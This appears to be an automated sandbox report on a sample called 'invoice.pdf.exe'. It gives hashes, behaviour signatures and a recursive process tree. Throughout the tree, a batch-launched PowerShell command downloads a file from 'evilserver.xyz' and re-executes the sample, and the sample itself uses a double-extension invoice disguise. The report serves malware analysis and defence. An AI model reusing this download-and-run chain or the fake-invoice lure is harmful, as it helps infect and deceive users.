Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
138s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
02/10/2023, 16:56
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
invoice.pdf.exe
Resource
win7-20230831-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
invoice.pdf.exe
Resource
win10v2004-20230915-en
11 signatures
150 seconds
General
-
Target
invoice.pdf.exe
-
Size
302KB
-
MD5
e8c158e6c3ebf4a4ed03721dd541a7ef
-
SHA1
9efe7c2f9ff9659c8b16b8ea037458463bd02f14
-
SHA256
d173fdd600b0577f376067d758da1ccfa63daba40f5f9cbd1e0c14c13df739e4
-
SHA512
e1bfcbcb6a69dd6f127ee4a87a3ceb1b5ae43c478551762083b309098714421479b0da28b577344a9d1dcb3e3cbcdaaff8c458debb146d4356392d114673da4f
-
SSDEEP
1536:P7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfvxZRnpwwOL:jq6+ouCpk2mpcWJ0r+QNTBfvs
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs
pid Process 2668 invoice.pdf.exe 2536 invoice.pdf.exe 1808 invoice.pdf.exe 1804 invoice.pdf.exe 1760 invoice.pdf.exe 1812 invoice.pdf.exe 3008 invoice.pdf.exe 1976 invoice.pdf.exe 2388 invoice.pdf.exe 2952 invoice.pdf.exe 2632 invoice.pdf.exe 2488 invoice.pdf.exe 2080 invoice.pdf.exe 1748 invoice.pdf.exe 2192 invoice.pdf.exe 2380 invoice.pdf.exe 2312 invoice.pdf.exe 1780 invoice.pdf.exe 2248 invoice.pdf.exe 2620 invoice.pdf.exe 2300 invoice.pdf.exe 1836 invoice.pdf.exe 2676 invoice.pdf.exe 1364 invoice.pdf.exe 1528 invoice.pdf.exe 1740 invoice.pdf.exe 804 invoice.pdf.exe 2368 invoice.pdf.exe 2228 invoice.pdf.exe 2644 invoice.pdf.exe 2164 invoice.pdf.exe 456 invoice.pdf.exe 1552 invoice.pdf.exe 2616 invoice.pdf.exe 1020 invoice.pdf.exe 2372 invoice.pdf.exe 2272 invoice.pdf.exe 2156 invoice.pdf.exe 1480 invoice.pdf.exe 3124 invoice.pdf.exe 3256 invoice.pdf.exe 3392 invoice.pdf.exe 3524 invoice.pdf.exe 3652 invoice.pdf.exe 3792 invoice.pdf.exe 3932 invoice.pdf.exe 4068 invoice.pdf.exe 3208 invoice.pdf.exe 3324 invoice.pdf.exe 3532 invoice.pdf.exe 3720 invoice.pdf.exe 3900 invoice.pdf.exe 3116 invoice.pdf.exe 3240 invoice.pdf.exe 3516 invoice.pdf.exe 3892 invoice.pdf.exe 4004 invoice.pdf.exe 3292 invoice.pdf.exe 3452 invoice.pdf.exe 3744 invoice.pdf.exe 3980 invoice.pdf.exe 2680 invoice.pdf.exe 3640 invoice.pdf.exe 3520 invoice.pdf.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2936 powershell.exe 2752 powershell.exe 2880 powershell.exe 588 powershell.exe 1096 powershell.exe 2988 powershell.exe 2280 powershell.exe 2232 powershell.exe 1548 powershell.exe 2056 powershell.exe 2912 powershell.exe 2612 powershell.exe 2420 powershell.exe 2396 powershell.exe 2284 powershell.exe 1600 powershell.exe 3012 powershell.exe 2364 powershell.exe 1260 powershell.exe 1424 powershell.exe 2504 powershell.exe 864 powershell.exe 1700 powershell.exe 2280 powershell.exe 2240 powershell.exe 2936 powershell.exe 1484 powershell.exe 2284 powershell.exe 1560 powershell.exe 304 powershell.exe 1080 powershell.exe 2808 powershell.exe 2980 powershell.exe 2636 powershell.exe 2272 invoice.pdf.exe 2980 powershell.exe 2232 powershell.exe 108 powershell.exe 2232 powershell.exe 1600 powershell.exe 608 powershell.exe 3172 powershell.exe 3304 powershell.exe 3440 powershell.exe 3572 powershell.exe 3704 powershell.exe 3840 powershell.exe 3980 powershell.exe 3092 powershell.exe 3192 powershell.exe 3404 powershell.exe 3584 powershell.exe 3708 powershell.exe 4028 powershell.exe 3204 powershell.exe 3312 powershell.exe 3736 powershell.exe 1876 powershell.exe 3996 powershell.exe 3340 powershell.exe 3640 invoice.pdf.exe 3708 powershell.exe 3264 powershell.exe 3492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 304 powershell.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 2272 invoice.pdf.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 3304 powershell.exe Token: SeDebugPrivilege 3440 powershell.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeDebugPrivilege 3980 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeDebugPrivilege 3404 powershell.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 3204 powershell.exe Token: SeDebugPrivilege 3312 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3640 invoice.pdf.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3492 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 868 wrote to memory of 2888 868 invoice.pdf.exe 28 PID 868 wrote to memory of 2888 868 invoice.pdf.exe 28 PID 868 wrote to memory of 2888 868 invoice.pdf.exe 28 PID 868 wrote to memory of 2888 868 invoice.pdf.exe 28 PID 2888 wrote to memory of 2936 2888 cmd.exe 30 PID 2888 wrote to memory of 2936 2888 cmd.exe 30 PID 2888 wrote to memory of 2936 2888 cmd.exe 30 PID 2888 wrote to memory of 2668 2888 cmd.exe 31 PID 2888 wrote to memory of 2668 2888 cmd.exe 31 PID 2888 wrote to memory of 2668 2888 cmd.exe 31 PID 2888 wrote to memory of 2668 2888 cmd.exe 31 PID 2668 wrote to memory of 2492 2668 invoice.pdf.exe 32 PID 2668 wrote to memory of 2492 2668 invoice.pdf.exe 32 PID 2668 wrote to memory of 2492 2668 invoice.pdf.exe 32 PID 2668 wrote to memory of 2492 2668 invoice.pdf.exe 32 PID 2492 wrote to memory of 2752 2492 cmd.exe 34 PID 2492 wrote to memory of 2752 2492 cmd.exe 34 PID 2492 wrote to memory of 2752 2492 cmd.exe 34 PID 2492 wrote to memory of 2536 2492 cmd.exe 35 PID 2492 wrote to memory of 2536 2492 cmd.exe 35 PID 2492 wrote to memory of 2536 2492 cmd.exe 35 PID 2492 wrote to memory of 2536 2492 cmd.exe 35 PID 2536 wrote to memory of 2604 2536 invoice.pdf.exe 36 PID 2536 wrote to memory of 2604 2536 invoice.pdf.exe 36 PID 2536 wrote to memory of 2604 2536 invoice.pdf.exe 36 PID 2536 wrote to memory of 2604 2536 invoice.pdf.exe 36 PID 2604 wrote to memory of 2880 2604 cmd.exe 38 PID 2604 wrote to memory of 2880 2604 cmd.exe 38 PID 2604 wrote to memory of 2880 2604 cmd.exe 38 PID 2604 wrote to memory of 1808 2604 cmd.exe 39 PID 2604 wrote to memory of 1808 2604 cmd.exe 39 PID 2604 wrote to memory of 1808 2604 cmd.exe 39 PID 2604 wrote to memory of 1808 2604 cmd.exe 39 PID 1808 wrote to memory of 2472 1808 invoice.pdf.exe 40 PID 1808 wrote to memory of 2472 1808 invoice.pdf.exe 40 PID 1808 wrote to memory of 2472 1808 invoice.pdf.exe 40 PID 1808 wrote to memory of 2472 1808 invoice.pdf.exe 40 PID 2472 wrote to memory of 588 2472 cmd.exe 42 PID 2472 wrote to memory of 588 2472 cmd.exe 42 PID 2472 wrote to memory of 588 2472 cmd.exe 42 PID 2472 wrote to memory of 1804 2472 cmd.exe 43 PID 2472 wrote to memory of 1804 2472 cmd.exe 43 PID 2472 wrote to memory of 1804 2472 cmd.exe 43 PID 2472 wrote to memory of 1804 2472 cmd.exe 43 PID 1804 wrote to memory of 1140 1804 invoice.pdf.exe 44 PID 1804 wrote to memory of 1140 1804 invoice.pdf.exe 44 PID 1804 wrote to memory of 1140 1804 invoice.pdf.exe 44 PID 1804 wrote to memory of 1140 1804 invoice.pdf.exe 44 PID 1140 wrote to memory of 1096 1140 cmd.exe 46 PID 1140 wrote to memory of 1096 1140 cmd.exe 46 PID 1140 wrote to memory of 1096 1140 cmd.exe 46 PID 1140 wrote to memory of 1760 1140 cmd.exe 47 PID 1140 wrote to memory of 1760 1140 cmd.exe 47 PID 1140 wrote to memory of 1760 1140 cmd.exe 47 PID 1140 wrote to memory of 1760 1140 cmd.exe 47 PID 1760 wrote to memory of 1180 1760 invoice.pdf.exe 48 PID 1760 wrote to memory of 1180 1760 invoice.pdf.exe 48 PID 1760 wrote to memory of 1180 1760 invoice.pdf.exe 48 PID 1760 wrote to memory of 1180 1760 invoice.pdf.exe 48 PID 1180 wrote to memory of 2988 1180 cmd.exe 50 PID 1180 wrote to memory of 2988 1180 cmd.exe 50 PID 1180 wrote to memory of 2988 1180 cmd.exe 50 PID 1180 wrote to memory of 1812 1180 cmd.exe 51 PID 1180 wrote to memory of 1812 1180 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4A0B.tmp\4A0C.tmp\4A1C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5486.tmp\5487.tmp\5488.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf5⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FAD.tmp\5FAE.tmp\5FAF.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf7⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B41.tmp\6B42.tmp\6B43.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf9⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\760A.tmp\760B.tmp\760C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"10⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf11⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\80A5.tmp\80A6.tmp\80A7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"12⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf13⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1812 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8AE1.tmp\8AE2.tmp\8AE3.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"14⤵PID:2324
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf15⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3008 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9953.tmp\9954.tmp\9955.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"16⤵PID:1256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"17⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf17⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1976 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2A5.tmp\A2A6.tmp\A2A7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"18⤵PID:1496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"19⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf19⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2388 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AAA1.tmp\AAA2.tmp\AAA3.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"20⤵PID:332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"21⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf21⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2952 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B0C9.tmp\B0CA.tmp\B0CB.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"22⤵PID:1148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf23⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2632 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B451.tmp\B452.tmp\B453.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"24⤵PID:2712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"25⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf25⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2488 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B78C.tmp\B79D.tmp\B79E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"26⤵PID:2484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"27⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf27⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2080 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD18.tmp\BD19.tmp\BD1A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"28⤵PID:544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"29⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf29⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1748 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C10E.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"30⤵PID:980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"31⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf31⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2192 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4D5.tmp\C4D6.tmp\C4D7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"32⤵PID:1660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"33⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf33⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2380 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C88D.tmp\C88E.tmp\C88F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"34⤵PID:2820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"35⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf35⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2312 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC54.tmp\CC64.tmp\CC65.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"36⤵PID:1500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"37⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf37⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1780 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CFFC.tmp\CFFD.tmp\CFFE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"38⤵PID:1768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"39⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf39⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2248 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\D3D5.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"40⤵PID:1400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf41⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2620 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D6DF.tmp\D6EF.tmp\D6F0.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"42⤵PID:2684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"43⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf43⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2300 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA77.tmp\DA78.tmp\DA79.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"44⤵PID:752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"45⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf45⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1836 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DE2F.tmp\DE30.tmp\DE31.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"46⤵PID:1252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"47⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf47⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2676 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1B8.tmp\E1B9.tmp\E1BA.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"48⤵PID:2208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"49⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf49⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1364 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E466.tmp\E467.tmp\E468.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"50⤵PID:1776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"51⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf51⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1528 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E86C.tmp\E86D.tmp\E86E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"52⤵PID:2236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"53⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
